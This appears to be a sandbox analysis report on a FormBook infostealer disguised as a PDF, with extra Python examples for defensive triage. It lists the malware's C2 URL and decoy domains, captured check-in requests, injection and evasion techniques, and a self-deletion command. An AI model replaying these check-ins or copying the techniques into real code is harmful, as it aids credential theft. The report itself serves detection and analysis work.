
Analysis Report Swift copy.pdf.exe

Overview

General Information

Sample Name: Swift copy.pdf.exe
Analysis ID: 385261
MD5: 5946d0ee4becb515a1cf39ef3f3dde56
SHA1: 3321193ab8c09ab1098d8104afd021145eca89c3
SHA256: 2e2c3bd3883976fc398bc30cadaa16043e792861e7b12db344cd285375df8605
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses an obfuscated file name to hide its real file extension (double extension)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • Swift copy.pdf.exe (PID: 6628 cmdline: 'C:\Users\user\Desktop\Swift copy.pdf.exe' MD5: 5946D0EE4BECB515A1CF39EF3F3DDE56)
    • Swift copy.pdf.exe (PID: 6896 cmdline: C:\Users\user\Desktop\Swift copy.pdf.exe MD5: 5946D0EE4BECB515A1CF39EF3F3DDE56)
    • Swift copy.pdf.exe (PID: 6904 cmdline: C:\Users\user\Desktop\Swift copy.pdf.exe MD5: 5946D0EE4BECB515A1CF39EF3F3DDE56)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 7136 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • cscript.exe (PID: 6180 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 6248 cmdline: /c del 'C:\Users\user\Desktop\Swift copy.pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
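The process tree above is the evidence behind the hollowing, injection and self-deletion signatures: the sample starts two argument-less copies of itself, the second of those is credited with explorer.exe (code injected into the running shell), explorer.exe then starts 32-bit system binaries from SysWOW64, and cscript.exe finally runs cmd.exe to delete the original file. As an added example, not part of the Joe Sandbox report, the Python below encodes that tree as data and checks it for those four relationships, the way a responder would triage a similar tree from an EDR. PIDs, parents and command lines are the ones listed above; the image path of cmd.exe is not printed in the tree, so only its name is used (an assumption).

```python
import ntpath
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class Proc:
    pid: int
    image: str                 # executable path as the report lists it
    cmdline: str
    parent: Optional[int] = None


SAMPLE = r"C:\Users\user\Desktop\Swift copy.pdf.exe"

# Constructed from the report's "Startup" tree: same PIDs, parents and command lines.
# cmd.exe's image path is not printed in the tree, so only its name is used (assumption).
TREE: List[Proc] = [
    Proc(6628, SAMPLE, f"'{SAMPLE}'"),
    Proc(6896, SAMPLE, SAMPLE, parent=6628),
    Proc(6904, SAMPLE, SAMPLE, parent=6628),
    Proc(3440, r"C:\Windows\explorer.exe", "", parent=6904),
    Proc(7136, r"C:\Windows\SysWOW64\autoconv.exe", r"C:\Windows\SysWOW64\autoconv.exe", parent=3440),
    Proc(6180, r"C:\Windows\SysWOW64\cscript.exe", r"C:\Windows\SysWOW64\cscript.exe", parent=3440),
    Proc(6248, "cmd.exe", f"/c del '{SAMPLE}'", parent=6180),
    Proc(724, r"C:\Windows\system32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", parent=6248),
]


def name(path: str) -> str:
    return ntpath.basename(path).lower()


def no_arguments(p: Proc) -> bool:
    """True when the command line is nothing but the (optionally quoted) image path."""
    return p.cmdline.strip("'\"").lower() == p.image.lower()


def analyze(tree: List[Proc], sample: str = SAMPLE) -> Dict[str, List[int]]:
    """Return the PIDs that match each of the four FormBook execution-chain findings."""
    by_pid = {p.pid: p for p in tree}
    findings: Dict[str, List[int]] = defaultdict(list)
    for p in tree:
        par = by_pid.get(p.parent) if p.parent is not None else None
        # 1. The sample starts a copy of itself with no arguments: the suspended child
        #    that the "creates a process in suspended mode" / "process hollowing"
        #    signatures describe.
        if par and par.image.lower() == sample.lower() == p.image.lower() and no_arguments(p):
            findings["self_spawn"].append(p.pid)
        # 2. explorer.exe attributed to the sample as a child: the sandbox records the
        #    already-running shell under the sample once code has been injected into it.
        if name(p.image) == "explorer.exe" and par and par.image.lower() == sample.lower():
            findings["explorer_injected"].append(p.pid)
        # 3. A 32-bit system binary from SysWOW64, started by explorer.exe with no
        #    arguments: the next-stage host (autoconv.exe and cscript.exe in this run).
        if par and name(par.image) == "explorer.exe" and "\\syswow64\\" in p.image.lower() and no_arguments(p):
            findings["syswow64_host"].append(p.pid)
        # 4. cmd.exe /c del <sample>: the dropper removes itself after the injection.
        if name(p.image) == "cmd.exe" and "del " in p.cmdline.lower() and sample.lower() in p.cmdline.lower():
            findings["self_delete"].append(p.pid)
    return dict(findings)


if __name__ == "__main__":
    for finding, pids in analyze(TREE).items():
        print(f"{finding:18s} {pids}")
```

Each check is deliberately narrow: finding 3, for instance, requires both the SysWOW64 path and an empty argument list, because explorer.exe legitimately launches 32-bit programs on a 64-bit host, whereas a bare autoconv.exe or cscript.exe with no script argument has no ordinary reason to exist.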

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.wapgoals.com/ifne/"], "decoy": ["science1230.com", "louiesluncheonette.com", "radsum.info", "ziscogore.com", "smlet.com", "bbasgroup.com", "trailyerlife.com", "sparklingtheworld.com", "rileysboutique.com", "weightneutralmetflex.com", "haznegocioconnosotros.com", "hfuu.net", "tdfsz.com", "buymy1sthome.com", "karmicreaction.com", "yy111.xyz", "bkajaxkja.com", "midtownbuilder.com", "stepmed.life", "alkeses.com", "xstreamagile.com", "prostroyka.com", "xisiman1688.com", "eyelashextensionssanantonio.com", "arrowinsightshunter.com", "lehoachi.com", "rasodemeinkauntha.com", "columbiaprobateattorney.com", "ashleypeckich.com", "thevintagemarque.com", "lorofineart.com", "wearegrowthhackerz.com", "abramstrucking.net", "technomark.xyz", "cursalee.com", "ultimatecatnutrtion.com", "fundamentalflavors.com", "jamaicanallstars.net", "africanosworld.com", "maskfinland.com", "modkit.design", "xuannghiaduong.com", "indiafoodtraveling.com", "towhonoatelecilasyah.site", "agenciaorange.net", "shelterlaapparel.com", "criticalredux.com", "srl-4.com", "bioclear.energy", "mytransactionkeeper.com", "elektroliquid.com", "brabrains.com", "melodylandrum.com", "felipestephan.com", "rosemancreations.com", "lithoprints.art", "ulsanteam.com", "datingliste.online", "solitairenola.com", "kuppers.info", "burningpeel.com", "myscottdalechiropractor.com", "greenzebranetworks.com", "marktheoilguy.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff: $sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102: $sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777: $sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166a9: $sqlite3step: 68 34 1C 7B E1
  • 0x167bc: $sqlite3step: 68 34 1C 7B E1
  • 0x166d8: $sqlite3text: 68 38 2A 90 C5
  • 0x167fd: $sqlite3text: 68 38 2A 90 C5
  • 0x166eb: $sqlite3blob: 68 53 D8 7F 8C
  • 0x16813: $sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff: $sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102: $sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777: $sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(15 further memory-dump entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
5.2.Swift copy.pdf.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.Swift copy.pdf.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b72: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13885: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13371: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13987: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13aff: $sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x858a: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125ec: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9302: $sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18977: $sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a1a: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.Swift copy.pdf.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x158a9: $sqlite3step: 68 34 1C 7B E1
  • 0x159bc: $sqlite3step: 68 34 1C 7B E1
  • 0x158d8: $sqlite3text: 68 38 2A 90 C5
  • 0x159fd: $sqlite3text: 68 38 2A 90 C5
  • 0x158eb: $sqlite3blob: 68 53 D8 7F 8C
  • 0x15a13: $sqlite3blob: 68 53 D8 7F 8C
5.2.Swift copy.pdf.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.Swift copy.pdf.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff: $sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102: $sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777: $sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(1 further unpacked-PE entry not shown)
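The Strings column above lists, per rule, the byte sequences that matched and the offset of each hit. Two things are worth checking by hand: the three JPCERT/CC strings are each a single `push imm32` instruction (opcode 0x68 followed by a little-endian 32-bit constant), and every offset in the rebuilt image (`...400000.0.unpack`) is exactly 0xE00 lower than the same hit in the raw dump (`...raw.unpack` and the 00000005 memory dump), so the two views hold the same code at a shifted file position. As an added example, not from the report and not the code of either rule's authors, the Python below scans a constructed buffer for five of the listed strings, decodes the push immediates, and verifies the constant delta. The buffer is zero-filled with the patterns written at the reported offsets and contains no FormBook code; the rule conditions are not on the page and are not reproduced.

```python
import struct
from typing import Dict, List, Optional

# Hex strings copied from the YARA matches in the report (three JPCERT/CC strings and
# two yara-signator sequences). The rules' conditions are not on the page, so this
# reports per-string hits rather than a rule verdict.
PATTERNS: Dict[str, str] = {
    "$sqlite3step": "68 34 1C 7B E1",
    "$sqlite3text": "68 38 2A 90 C5",
    "$sqlite3blob": "68 53 D8 7F 8C",
    "$sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
    "$sequence_7": "66 89 0C 02 5B 8B E5 5D",
}

# Offsets the report lists for the rebuilt image (5.2.Swift copy.pdf.exe.400000.0.unpack)
# and for the raw dump (...400000.0.raw.unpack / the 00000005...00FB0000 memory dump).
UNPACK_OFFSETS: Dict[str, List[int]] = {
    "$sqlite3step": [0x158a9, 0x159bc], "$sqlite3text": [0x158d8, 0x159fd],
    "$sqlite3blob": [0x158eb, 0x15a13], "$sequence_0": [0x77e8, 0x7b72],
    "$sequence_7": [0x9302],
}
RAW_OFFSETS: Dict[str, List[int]] = {
    "$sqlite3step": [0x166a9, 0x167bc], "$sqlite3text": [0x166d8, 0x167fd],
    "$sqlite3blob": [0x166eb, 0x16813], "$sequence_0": [0x85e8, 0x8972],
    "$sequence_7": [0xa102],
}


def hex_to_bytes(s: str) -> bytes:
    return bytes.fromhex(s.replace(" ", ""))


def build_buffer(size: int, offsets: Dict[str, List[int]]) -> bytes:
    """Constructed stand-in for the dump: zero-filled, with each pattern written at the
    offsets the report lists. It contains no real FormBook code."""
    buf = bytearray(size)
    for name, offs in offsets.items():
        needle = hex_to_bytes(PATTERNS[name])
        for o in offs:
            buf[o:o + len(needle)] = needle
    return bytes(buf)


def scan(buf: bytes, patterns: Dict[str, str] = PATTERNS) -> Dict[str, List[int]]:
    """Every offset at which each pattern occurs (overlapping hits included): the same
    information the Strings column of the report shows per rule."""
    hits: Dict[str, List[int]] = {}
    for name, hexstr in patterns.items():
        needle, offs, i = hex_to_bytes(hexstr), [], 0
        while (i := buf.find(needle, i)) != -1:
            offs.append(i)
            i += 1
        hits[name] = offs
    return hits


def push_imm32(hexstr: str) -> int:
    """The JPCERT strings are single 'push imm32' instructions (opcode 0x68 plus a
    4-byte little-endian immediate); return the immediate, the constant the rule keys on."""
    b = hex_to_bytes(hexstr)
    if len(b) != 5 or b[0] != 0x68:
        raise ValueError("not a push imm32 encoding")
    return struct.unpack("<I", b[1:])[0]


def constant_delta(a: Dict[str, List[int]], b: Dict[str, List[int]]) -> Optional[int]:
    """If every hit in view a sits at one fixed distance from the matching hit in view b,
    return that distance; None when the two views do not line up."""
    deltas = {x - y for k in a for x, y in zip(a[k], b.get(k, []))}
    return deltas.pop() if len(deltas) == 1 else None


if __name__ == "__main__":
    raw_hits = scan(build_buffer(0x17000, RAW_OFFSETS))
    unpack_hits = scan(build_buffer(0x16000, UNPACK_OFFSETS))
    for name, offs in unpack_hits.items():
        print(f"{name:14s} {[hex(o) for o in offs]}")
    print("raw - unpack delta:", hex(constant_delta(raw_hits, unpack_hits)))
    for name in ("$sqlite3step", "$sqlite3text", "$sqlite3blob"):
        print(f"{name:14s} push 0x{push_imm32(PATTERNS[name]):08X}")
```

A constant delta across every string is the quick sanity check that the rebuilt PE and the raw dump are the same payload and that neither view was truncated; a delta that differs between strings would mean the views were cut at different points or belong to different payloads.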

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook (the full C2 and decoy lists are reproduced in the Malware Configuration section above)
Multi AV Scanner detection for submitted file
Source: Swift copy.pdf.exe | Virustotal: Detection: 30%
Source: Swift copy.pdf.exe | ReversingLabs: Detection: 20%
Yara detected FormBook
Source: Yara match | File source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 5.2.Swift copy.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.Swift copy.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: Swift copy.pdf.exe | Joe Sandbox ML: detected

Source: 5.2.Swift copy.pdf.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: Swift copy.pdf.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Swift copy.pdf.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cscript.pdbUGP | source: Swift copy.pdf.exe, 00000005.00000002.389930422.0000000000FF0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000007.00000000.376832719.000000000DC20000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: Swift copy.pdf.exe, 00000005.00000002.389961809.0000000001070000.00000040.00000001.sdmp, cscript.exe, 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: Swift copy.pdf.exe, 00000005.00000002.389961809.0000000001070000.00000040.00000001.sdmp, cscript.exe
Source: Binary string: cscript.pdb | source: Swift copy.pdf.exe, 00000005.00000002.389930422.0000000000FF0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000007.00000000.376832719.000000000DC20000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\Swift copy.pdf.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h (4 matches)

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49726 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49726 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49726 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 51.222.80.112:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 51.222.80.112:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 51.222.80.112:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49758 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49758 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49758 -> 184.168.131.241:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.wapgoals.com/ifne/
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe | DNS query: www.technomark.xyz
Source: global traffic | HTTP traffic detected: GET /ifne/?AjR=71EtUWdYzxABpFekNdqC6lfpkzJYpQcnmhsYNVCZgcOb/UTZrYaS228nAxG5B59FDGhBRZlxww==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1 | Host: www.wapgoals.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ifne/?AjR=dOs+lg2asUoXBO5EZg435RwPxJJuMD/jvsmygwM2KrqI9lfFwJ6FtdZyv1m6A/DgItG0MeGBng==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1 | Host: www.criticalredux.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ifne/?AjR=zzTxArteMsObKw8PVSTAy3ItaE+XllOQAe/BMiW6EZ4sNP9JkFpsMwiszAJkxQMr59SfztPEEw==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1 | Host: www.rileysboutique.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ifne/?AjR=8GjGM9gH0JgPTr1fPV35mssmA8Ddbt0y6EKlVm4ORHEqitqlBaDBsMKhu0jqcrmxAKX5kfGUAw==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1 | Host: www.agenciaorange.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ifne/?AjR=rtUU9PmTXQaf/wGdlMxfwAVfjNGr3c9lw0dfQP58ZOH4+/gv/3vAFDrG/mXph96X+27XXnGiag==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1 | Host: www.technomark.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ifne/?AjR=uTh+jOJLcZ1+A+ZwJUR1QlGf4dkpQViro8P/md11fzExOFziGJv9l1WMjbCU3sRscsfoVkwx1Q==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1 | Host: www.indiafoodtraveling.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 204.11.56.48
Source: Joe Sandbox View | ASN Name: IHNETUS
Source: Joe Sandbox View | ASN Name: CONFLUENCE-NETWORK-INCVG
Source: unknown | DNS traffic detected: queries for: www.wapgoals.com
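The captured requests all have the same shape (GET to /ifne/, two query parameters of which AjR is a base64 blob, Connection: close, no User-Agent), and they go to the real C2 from the configuration (www.wapgoals.com) and to decoy hosts alike; only the extracted configuration tells the two apart, which is also why the three ET FormBook CnC Checkin alerts above fire on three different destinations. As an added example, not part of the Joe Sandbox report, the Python below rebuilds three of the requests above as raw HTTP text (constructed from the rows, with the header lines separated), parses them, tests for that check-in shape, and labels each Host as c2, decoy or unknown against the configuration. The configuration is the report's, trimmed to the decoys that appear in the traffic; the fourth request is a benign control that is not in the report. The shape test describes this sample's traffic only and is not offered as a general FormBook signature.

```python
import base64
import binascii
import json
from typing import Dict, List, Tuple

# The extractor output as printed in the report (C2 list plus the decoy entries whose
# hosts appear in the captured traffic; the full decoy list is in the Malware
# Configuration section).
CONFIG: Dict[str, List[str]] = json.loads("""
{"C2 list": ["www.wapgoals.com/ifne/"],
 "decoy": ["rileysboutique.com", "technomark.xyz", "indiafoodtraveling.com",
           "agenciaorange.net", "criticalredux.com", "stepmed.life"]}
""")

# Constructed raw requests, rebuilt from the "HTTP traffic detected" rows with the header
# lines separated. The last request is a benign control that is not in the report.
REQUESTS: List[str] = [
    "GET /ifne/?AjR=71EtUWdYzxABpFekNdqC6lfpkzJYpQcnmhsYNVCZgcOb/UTZrYaS228nAxG5B59FDGhBRZlxww==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1\r\nHost: www.wapgoals.com\r\nConnection: close\r\n\r\n",
    "GET /ifne/?AjR=dOs+lg2asUoXBO5EZg435RwPxJJuMD/jvsmygwM2KrqI9lfFwJ6FtdZyv1m6A/DgItG0MeGBng==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1\r\nHost: www.criticalredux.com\r\nConnection: close\r\n\r\n",
    "GET /ifne/?AjR=rtUU9PmTXQaf/wGdlMxfwAVfjNGr3c9lw0dfQP58ZOH4+/gv/3vAFDrG/mXph96X+27XXnGiag==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1\r\nHost: www.technomark.xyz\r\nConnection: close\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\nConnection: close\r\n\r\n",
]


def parse_request(raw: str) -> Dict[str, object]:
    """Minimal HTTP/1.1 request parser: method, path, raw query pairs, lower-cased headers.
    The query is split by hand so the '+' and '/' inside the base64 value survive intact."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    pairs: List[Tuple[str, str]] = []
    for kv in (query.split("&") if query else []):
        k, _, v = kv.partition("=")       # first '=' only; trailing '==' padding stays in v
        pairs.append((k, v))
    headers: Dict[str, str] = {}
    for line in header_lines:
        k, _, v = line.partition(":")
        headers[k.strip().lower()] = v.strip()
    return {"method": method, "path": path, "query": pairs, "headers": headers}


def is_base64_blob(v: str, min_len: int = 32) -> bool:
    """Standard-alphabet base64 of plausible length. '-' is not in the standard alphabet,
    so the short ndndsL value is rejected and only AjR qualifies."""
    if len(v) < min_len or len(v) % 4:
        return False
    try:
        base64.b64decode(v, validate=True)
        return True
    except binascii.Error:
        return False


def checkin_shape(req: Dict[str, object]) -> bool:
    """The shape of this sample's check-ins: GET to a one-directory path, exactly two
    query parameters of which exactly one is a base64 blob, and no User-Agent header
    (the report's "HTTP GET or POST without a user agent" signature)."""
    path, query, headers = req["path"], req["query"], req["headers"]
    return (req["method"] == "GET"
            and path.count("/") == 2 and path.endswith("/")
            and len(query) == 2
            and sum(is_base64_blob(v) for _, v in query) == 1
            and "user-agent" not in headers)


def strip_www(host: str) -> str:
    return host[4:] if host.startswith("www.") else host


def classify_host(host: str, path: str, config: Dict[str, List[str]] = CONFIG) -> str:
    """'c2' when host and path match a C2 list entry, 'decoy' when the host is on the
    decoy list, else 'unknown'. The config, not the traffic, separates real C2 from decoys."""
    for entry in config["C2 list"]:
        c2_host, _, c2_path = entry.partition("/")
        if strip_www(host) == strip_www(c2_host) and path == "/" + c2_path:
            return "c2"
    if strip_www(host) in config["decoy"]:
        return "decoy"
    return "unknown"


def triage(raw_requests: List[str] = REQUESTS, config: Dict[str, List[str]] = CONFIG) -> List[Dict[str, object]]:
    """Per request: Host, whether it has the check-in shape, and its role per the config."""
    rows: List[Dict[str, object]] = []
    for raw in raw_requests:
        req = parse_request(raw)
        host = req["headers"].get("host", "")
        checkin = checkin_shape(req)
        rows.append({"host": host, "checkin": checkin,
                     "role": classify_host(host, req["path"], config) if checkin else "n/a"})
    return rows


if __name__ == "__main__":
    for row in triage():
        print(f"{row['host']:28s} checkin={row['checkin']!s:5s} role={row['role']}")
```

When the extracted configuration is not available, the decoy traffic is indistinguishable from the real check-in at the HTTP layer, so blocking or sinkholing only the hosts that triggered the IDS alerts would miss the C2 as often as it hits it; the C2 list entry is the indicator to act on.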
Source: Swift copy.pdf.exe, 00000000.00000003.328158175.0000000005739000.00000004.00000001.sdmp | String found in binary or memory: http://en.w
Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
